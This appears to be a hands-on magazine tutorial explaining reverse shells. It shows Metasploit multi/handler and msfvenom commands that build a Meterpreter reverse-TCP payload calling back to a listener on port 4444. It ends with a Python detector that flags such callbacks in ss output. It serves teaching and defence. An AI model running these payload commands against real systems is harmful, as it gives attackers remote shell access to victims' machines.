Malicious hackers might use all kinds of techniques to foist their malware onto unsuspecting targets. Getting a payload (something that an attacker wants to execute on a target machine) into a well-protected target network might not be as simple as adding a dodgy attachment to an email. Don’t get us wrong, this (and sending malicious links) still works a lot of the time. But if a target is too canny (with the filters, firewalls and what have you) for these techniques, then some additional know-how is required. This might involve exploiting some vulnerability that the attacker has inside knowledge of, or it might involve paying an initial-access broker for login credentials.
Once inside a network, our intrepid attacker needs some means of executing the payload. That payload might be anything from an information stealer or something that tries to delete everything (a wiper) to ransomware or something to gain more persistent access. Whatever the final goal, the excitement often begins with a reverse shell. This is a program that the target is tricked into running, and which causes the target machine to call out to an attacker-controlled machine. That machine is listening for the call, so the connection is outbound from the target’s point of view and sails past basic firewall protections (which might only block incoming connections). Once the listener picks up, the attacker gets shell access and can execute commands on the remote machine. It might be a Bash shell, a PowerShell shell, or maybe a bespoke shell coded in any language supported on the machine (for stealth).
BUILDING A CUSTOM EXPLOIT
Who says Linux doesn’t get malware? We’re going to go ahead and build some. Except don’t worry, it won’t cause any unintended harm. Rather it’ll show you how a reverse shell works and give you hands-on payload engineering. We’ll first use Metasploit’s multi-handler to get our BackBox machine listening for Meterpreter connections:
msf6 > use multi/handler
The prompt will change. The multi-handler is used to manage connections from any payloads. Type show payloads to see them all. Now select the Meterpreter shell with:
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter_reverse_tcp
This must be the same payload name you later hand to msfvenom (the stageless 64-bit build), otherwise the handler won’t know what to do with the connection when it arrives.
Now we need to bake in our IP address (use localhost if you don’t feel like trying this over your LAN) and a port our ‘malware’ can use to connect to us. Let’s say:
set LHOST 192.168.0.100
set LPORT 4444
exploit
There, our machine is now listening for Meterpreter connections. Now we use MSFVenom to forge the TCP witchcraft that we’ll run on the target machine. Open a new terminal and run:
$ msfvenom -p linux/x64/meterpreter_reverse_tcp --format elf LHOST=localhost LPORT=4444 > malware.run
The LHOST and LPORT here must match the address and port the handler is listening on, so if you went with 192.168.0.100 above, put that here instead of localhost.
Put the malware.run file on your target machine (no, we won’t tell you how to do this if you don’t already have access to that machine). Then run it with ./malware.run and go back to Metasploit on our BackBox machine. You should see a message saying that a Meterpreter session has been opened, and you are now free to pwn yourself.
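Once the session is up, it’s worth seeing what the callback looks like from the target’s side, because that outbound connection is exactly what a defender hunts for. The script below is an added example (not part of the original tutorial or of Metasploit) that runs a couple of simple rules over a constructed sample in the shape of ss -tnp output: an unrecognised binary talking to an uncommon port (Meterpreter’s default 4444 included), and a shell whose stdin or stdout is the socket itself. The baseline process list and port list are assumptions you would tune for your own machine.

```python
import re

# Constructed sample in the shape of `ss -tnp` output; not a real capture.
SAMPLE_SS_OUTPUT = """\
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
ESTAB 0 0 192.168.0.55:44810 192.168.0.20:443 users:(("firefox",pid=2210,fd=61))
ESTAB 0 0 192.168.0.55:51234 192.168.0.100:4444 users:(("malware.run",pid=3142,fd=3))
ESTAB 0 0 192.168.0.55:51240 203.0.113.9:8080 users:(("bash",pid=3150,fd=0))
ESTAB 0 0 192.168.0.55:36020 192.168.0.2:22 users:(("ssh",pid=1901,fd=3))
"""

# Assumed baseline: processes that legitimately hold outbound connections here.
BASELINE_PROCESSES = {"firefox", "ssh", "curl", "wget", "apt"}
# Assumed baseline: peer ports where an outbound connection is ordinary.
COMMON_PORTS = {22, 53, 80, 443, 587, 993}
SHELLS = {"sh", "bash", "dash", "zsh"}

# Matches the Process column, e.g. users:(("bash",pid=3150,fd=0))
PROC_RE = re.compile(r'users:\(\("([^"]+)",pid=(\d+),fd=(\d+)\)\)')


def parse_ss(text):
    """Yield (peer_ip, peer_port, proc_name, pid, fd) for each ESTAB line."""
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 6 or fields[0] != "ESTAB":
            continue
        peer_ip, peer_port = fields[4].rsplit(":", 1)
        m = PROC_RE.search(fields[5])
        if not m:
            continue
        yield peer_ip, int(peer_port), m.group(1), int(m.group(2)), int(m.group(3))


def suspicious_connections(text):
    """Return (reason, pid, proc, peer) for connections that look like reverse-shell callbacks."""
    findings = []
    for ip, port, proc, pid, fd in parse_ss(text):
        peer = f"{ip}:{port}"
        if proc in SHELLS and fd <= 2:
            # The shell's stdin/stdout is the socket: the classic dup2'd reverse shell.
            findings.append(("shell bound to socket", pid, proc, peer))
        elif proc not in BASELINE_PROCESSES and port not in COMMON_PORTS:
            # Unknown binary talking to an unusual port (4444 is Meterpreter's default).
            findings.append(("unbaselined process on uncommon port", pid, proc, peer))
    return findings


if __name__ == "__main__":
    for finding in suspicious_connections(SAMPLE_SS_OUTPUT):
        print(finding)
```

Feed it live output with ss -tnp (run as root so the Process column is filled in) and you will see the Meterpreter callback flagged by the second rule; the first rule catches the bare-bones /bin/sh variants that don’t bother with a separate binary.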